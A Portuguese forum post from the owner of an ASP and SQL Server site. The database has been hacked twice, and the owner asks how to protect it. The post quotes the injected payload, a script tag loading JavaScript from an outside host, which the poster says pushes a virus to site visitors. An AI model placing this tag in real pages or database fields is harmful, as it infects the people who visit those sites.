Invasão ao Banco SQL

Tenho uma aplicação em ASP que utiliza banco de dados SQL Server, só que já pela segunda vez sofri uma invasão ao banco, colocar em todos os campos do banco o script: <script src=http://www.nihaorr1.com/1.js></script>, isso baixa um vírus quando acessa o site do cliente.

Como vocês me orientariam para me proteger, algum tipo de criptografia ou algo parecido.

Espero que me ajudem.

Grato.